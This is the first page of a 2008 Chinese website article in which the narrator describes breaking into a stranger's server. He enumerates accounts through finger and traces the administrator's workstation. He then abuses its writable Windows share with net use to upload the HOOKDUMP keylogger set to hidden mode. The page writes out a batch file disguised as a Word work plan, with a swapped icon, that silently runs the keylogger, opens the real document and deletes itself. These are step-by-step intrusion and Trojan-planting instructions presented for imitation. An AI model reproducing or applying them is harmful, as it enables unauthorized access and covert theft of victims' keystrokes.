文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | firefox | WPS | 杀毒软件 | Picasa
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形图像 办公软件 媒体动画 精文荟萃 常用软件 网页编程 技术开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院操作系统 Linux实例:黑客入侵Linux操作系统
精品推荐
特别推荐
·为何Linux比Windows更安全?
·Linux和Unix最常用的网络命令
·Linux系统下安全防护十大招数
·Linux各种服务器的架设
·Linux操作系统下用单网卡捆绑双IP
·恢复被误删除的Linux文件
·在Linux服务器上做备份和恢复
·Linux中网络参数的意义及其应用
·linux知识大全
·解析Linux服务器远程控制技术
·新手关于Linux系统的一些错误认识
·Linux系统至少有五大点比Vista更好
·Linux攻略 关于Apache安装、配置、优化
·详细讲解Linux操作系统的进程管理的功能
·解决Linux和Windows双系统的引导问题
·新手学堂:Linux操作系统安全性能检查笔记
·600个优秀网站
·提高Linux操作系统网速的方法
·Linux系统下挂载硬盘光驱和U盘的方法
·Linux发行版图标大全
热点TOP10
·Linux常用命令详解
·Linux学习手册
·Linux各种服务器的架设
·RedHat linux 8.0下内核编译步骤和说明
·网络组建大全(包括企业网、校园网、网吧和基础知识)
·LINUX 常见问题1000个详细解答
·Red Hat9.0与Win XP双系统安装指南
·VMware中Linux内核2.6.14.4编译全过程
·linux下jdk的安装与配置
·Linux下安装和使用杀毒软件AntiVir
·“红帽”发布Red Hat Linux 9操作系统
·linux知识大全
·Linux无盘工作站架设实例
·用.iso文件从硬盘安装redhat linux 7.3
·Linux系统安全机制进阶分析
·Linux root密码丢失后的解决
·Linux系统下挂载硬盘光驱和U盘的方法
·为Canon PIXMA iP1000喷墨打印机安装驱动程序
·正宗888葫芦 博彩游戏
·LINUX动态链接库高级应用

实例:黑客入侵Linux操作系统

日期:2008年1月20日 作者: 查看:[大字体 中字体 小字体]


  我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(by the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧),结果一个帐号也不存在,我没有再试它的帐号。因为我被它开的端口吸引住了,它开着WWW,我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在还是看看root的信息吧:

  finger root@xxx.xxx.xxx

  Login name: root In real life: system PRIVILEGED account

  Directory: / Shell: /bin/sh

  Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx

  No Plan.

  root经常来,那个202.xx.xx.xx就是他用的工作站了,从那会不会看到点东西呢?

  net view \202.xx.xx.xx

  Shared resources at \202.xx.xx.xx  

  Sharename Type Comment

  x

  x

  我的公文包

  The command was completed sUCcessfully.

  在上网的机器上开着WINDOWS的“文件和打印机共享”的服务,是很多人容易掉以轻心的,这个root没有例外。如果它的C盘共享了而且可写那就好了,但那是做梦,现在开了共享的目录没有一个是根目录,连D驱的都没有。别着急,慢慢来。x掉的那些文件夹都没用,不能写,里面尽是些英文原著,这个root还挺行的。“我的公文包”吸引了我的注意,这是一个用于将不同的机器上的资料进行同步的工具,很显然这个root要经常更新主机上的主页,有时候在自己的机器上编,有时候在主机上编……所以很重要的一点:“我的公文包”的共享一般都是可写的!  

  那我再进去看看。  

  >net use i: \202.xx.xx.xx

  >i:

  >echo asdf>temp.txt  

  不错,确实可写。 

  >del temp.txt  

  不留痕迹——黑客的习惯。 

  >dir/od/p  

  看看都有些什么…… 倒数第二排那个是什么?“X月工作计划.doc”!就是它了,既然是计划就不可能写完了就丢一边,它肯定会再次打开它的——至少下个月写计划时要COPY一下:->  

  该动手了,我的目标就是让它下次打开时误中我的陷阱而运行我藏的木马。我这次用的是一个键盘计录软件HOOKDUMP,我觉得它挺好的,价钱实惠,量也足…… 对不起,说习惯了,应该是它不仅记录下全部击键,还记录下打开或关掉了什么程序、按过什么按纽、用过什么菜单…… 总之,它的记录让你就和你站在他身后看他操作计算机一样详细了。您要问那么多木马你为啥装这个?要知道无论是中国的冰河、netspy还是外国的netbus、BO,都被各种杀毒软件列为头号侦查对象,而一个root的机器上可不可能没装杀毒软件?还是HOOKDUMP好,小小的,不起眼,不过如果大家都用只怕我再用它的机会就少了……  

  >copy hookdump.* i:  

  补充一点:上传前先编好它的hookdump.ini文件,置为隐藏方式运行,不然root一运行屏幕上蹦出一大窗口可就……。  

  然后再在自己的机器上编一个同名的BAT文件:X月工作计划.BAT 

  >edit c:X月工作计划.BAT

  @echo off

  hookdump

  attrib -h X月工作计划.doc

  C:Program FilesMicrosoftOfficeWinWord X月工作计划.doc

  attrib -h temp.bat

  del temp.pif

  del temp.bat  

  看明白了吧?root运行了这个BAT文件实际上就是先运行木马,再调用WINWORD文件打开它想开的这个文件,然后自我删除,也许它机器上WINWORD的位置不同,那调用就会失败,不过不要紧,反正BAT会马上删除,他会以为是自己的误操作。  

  这时你的C驱根目录就有了这么一个BAT文件,它是一个方形的图标,和那个WORD文件大相径庭,root怎么会运行它呢?没关系,在这个文件上点右键,点属性,在“程序”栏选“更改图标”不就行了吗?WORD的图标在你机器C:Program FilesMicrosoftOffice中。还要将“运行”改为“最小化”,“退出时关闭”打上勾,这样才能保证在运行时一点迹象也没有。事实上这个BAT文件变成了两个,还有一个PIF文件就是它的图标。  

[1] [2] 下一页 




上一篇:网站图片“另存为”为什么是bmp?

下一篇:Linux对Windows进行DDOS攻击办法

实例:黑客入侵Linux操作系统 相关文章:
·XP系统运行慢?小编自用7招解决
·将系统装到U盘中 如何自制XP@USB启动盘
·让Windows XP系统快10倍
·Vista系统使用技巧总结
·Windows 2003操作系统十四招加速技巧大全
·苹果操作系统精选
·侵入最大的六合彩论坛系统---六合专用BBS
·Windows XP操作系统中隐藏的20个秘密
·快马加鞭 20秒进入Win XP操作系统
·打造极速XP系统之绝对秘籍
实例:黑客入侵Linux操作系统 相关软件:
·公司企业网站管理系统模板功能强大版
·方正飞腾集成排版系统V4.1
·168行情系统V3.10
·亿尚发型设计管理系统
·卡丽来相片VCD制作系统 2003
·深入理解计算机系统电子杂志 PDF
·工作流管理系统 V1.1
·微方摄像头监控系统V7.5.02
·景易网络办公系统 解密版
·如何安装双系统

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:vipcn